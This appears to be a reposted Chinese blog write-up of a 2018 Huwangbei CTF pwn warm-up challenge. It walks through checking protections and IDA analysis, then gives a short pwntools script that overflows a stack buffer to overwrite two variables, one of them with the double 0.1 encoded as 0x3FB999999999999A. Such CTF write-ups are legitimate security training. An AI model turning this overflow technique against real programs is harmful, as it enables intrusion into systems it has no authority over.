2018护网杯的pwn签到题（详细过程） - 走看看

zoukankan html css js c++ java

2018护网杯的pwn签到题（详细过程）
题目：

链接：https://pan.baidu.com/s/1WcO-y2MQ6Wb17PqL2dxyyA
提取码：z5a7

首先找保护机制

难受保护全开！！

运行一下，发现只有一个输入点。

ida分析一波

发现只要满足 v7=0x7FFFFFFFFFFFFFFFLL 还有v8=0.1 但是在payload去传值需要用0x????,这里可以了解一下浮点型 0.1的值：

https://math.stackexchange.com/questions/1791562/converting-0-1-to-binary-64-bit-double?tdsourcetag=s_pctim_aiomsg

或者用c跑一下

思路：填buf，直到覆盖v7和v8的值，达到成功修改。
from pwn import * p = process('./pwn2') payload = '' payload += 'A'*24 + p64(0x7FFFFFFFFFFFFFFF) + p64(0x3FB999999999999A) p.sendline(payload) p.interactive()
比赛的时候脑子不是很好使，赛后不能再明明白白了。
查看全文

相关阅读:
【CF1416D】Graph and Queries（虚点）
【CF1120D】Power Tree（建图，差分，最小生成树）
AtCoder Regular Contest 121
[2021.5] 我要交作业！
[校内训练2021_03_03]C
[校内训练2021_03_02]C
[经验与教训2021_03_01-2021_03_05]
[校内训练2021_02_24]B，代数数的和仍然是代数数
 [校内训练2021_02_25]C
[经验与教训2021_02_19-2021_02_26]

原文地址：https://www.cnblogs.com/z3ro/p/9786742.html

Copyright © 2011-2022 走看看